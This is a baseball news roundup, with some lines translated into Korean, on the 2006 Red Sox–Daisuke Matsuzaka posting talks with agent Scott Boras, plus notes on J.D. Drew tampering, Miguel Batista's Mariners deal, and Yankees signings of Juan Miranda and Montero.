In a conference call Monday night, Red Sox GM Theo Epstein said the he's prepared to make a "record" offer to Daisuke Matsuzaka on Tuesday.

NEWPORT BEACH, Calif. (AP) - Scott Boras, the agent for Daisuke Matsuzaka, said lengthy meetings with Boston Red Sox executives were planned as the parties try to work out a deal with the Japanese pitcher before a Thursday night deadline.

그럼 오늘 시작되는 협상 이전 양 측의 요구는 어느 정도인지에 대해 간단히 보도록 하겠습니다.

The Lions will not receive any of the $51.1 million if Matsuzaka does not sign. The initial offer made by the Red Sox was believed to be between $7-8 million a year for four-six years, but Boras was reportedly asking for nearly $15 million a year.

In Boras's mind, that fair market price is $20 million, not that he's asking for it because of the posting system.

While Boras remains adamant in asking for close to a Jason Schmidt average annual value, Red Sox officials feel that the super agent prefers to keep Matsuzaka in Japan for two more years, then get $140 million for seven years after 2008.

Boston essentially needs to get the Matsuzaka agreement done by Tuesday night so they can get him in Wednesday for a physical prior to the Thursday deadline. One GM Friday said "it would be a shame for Matsuzaka and baseball to hold him out to try to force a change in the posting system." Boras has a very strong relationship with Theo Epstein, but he is willing to hold out players when necessary, such as Boston's current catcher and right fielder.

MLB has no intention of letting agent Scott Boras try to buy Daisuke Matsuzaka's freedom from the Seibu Lions should negotiations with the Red Sox fail.

메이저리그 사무국은 레드삭스와의 협상이 결렬될 경우, 보라스가 마쓰자카의 권리를 세이부 라이온즈로부터 사는 걸 허락할 의도가 없다고 합니다.


There's been some speculation that Boras would help Matsuzaka come up with a sufficient total to pay off the Lions. "The Commissioner’s office would not recognize that free agency, and the Japanese commissioner’s office is in agreement with us," said Lou Melendez, the vice president for international operations for MLB. If Matsuzaka declines to take Boston's offer, Boras could attempt to legally challenge the posting system. While he could build quite a case, even a successful challenge might not get Matsuzaka to the majors any sooner.

According to the Los Angeles Times, the Dodgers have decided against filing tampering charges against the Red Sox regarding J.D. Drew.

엘에이 타임스에 의하면, 다저스는 레드삭스에 대해 제이 디 드류 건으로 탬퍼링 기소를 하지 않기로 결정했다고 합니다.

The Dodgers hadn't seriously considered asking MLB to investigate until a New York Times column suggested tampering had occurred. Whether the reported threat of Boston's potential counter-tampering charges had anything to do with their decision might never be known.

The Seattle Times reports that the Mariners and Miguel Batista have agreed to terms on a three-year deal worth more than $24 million.

The Brewers are planning to tender all of their arbitration-eligible players, including Kevin Mench.

According to the Yankees, they have not yet signed Juan Miranda. The move is in the works apparently but the ESPN writer jumped the gun. There is also some evidence that he is 25, not 23.

As I said before, don't expect this guy to be the new Moose Skowron. $2 million for four years is short money in the current market.

While ESPN Deportes calls Miranda 23, several Cuban sources have the former Pinar Del Rio player with a 1981 birthday (some have a March birthdate, some April), which would make him 25. Newman confirmed that the Yankees and Montero, a Venezuelan catcher with prodigious power potential, had "long, involved" negotiations. He would not comment on the value of Montero's signing bonus, but said one source's information--that Montero's bonus had been restructured to $1.3 million--was not correct. His only on the record comment was that "there is no age issue" with Montero, who struggled in the Yankees' fall mini-camp.
